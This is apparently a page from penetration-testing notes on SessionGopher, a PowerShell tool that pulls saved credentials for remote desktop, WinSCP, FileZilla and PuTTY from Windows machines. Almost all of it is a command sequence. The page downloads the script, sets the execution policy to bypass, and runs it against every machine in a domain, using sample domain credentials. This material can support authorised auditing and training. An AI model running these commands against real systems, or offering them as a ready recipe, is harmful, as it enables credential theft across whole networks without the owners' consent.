Password stored in service

What is SessionGopher?

SessionGopher is a powershell script designed to extract saved credentials from remote desktop, WinSCP, FileZilla, PuTTY, and other application. It is primarily used for post-exploitaion and security auditing to identify stored password in various services.

SessionFopher Github Repo

Download and Running Session

Invoke-WebRequest -Uri "https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1" -OutFile ".\SessionGopher.ps1"

import the Module

Import-Module .\SessionGopher.ps1

If execution policies block script execution bypass them using:

Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass

powershell -nop -ep bypass

Extracting Passwords from Service

1. Extract Credentials from All Machines in the Domain

Invoke-SessionGopher -AllDomain -o

The -o Flag outputs the results to a file

2. Extract Credentials Using specific Domain Credentials

if authentication is required, specify the username and password

Invoke-SessionGopher -AllDomain -u domain.com\DevNull -p Secret@123

PreviousPassword in Registry NextPowerShell Command History

Last updated 1 month ago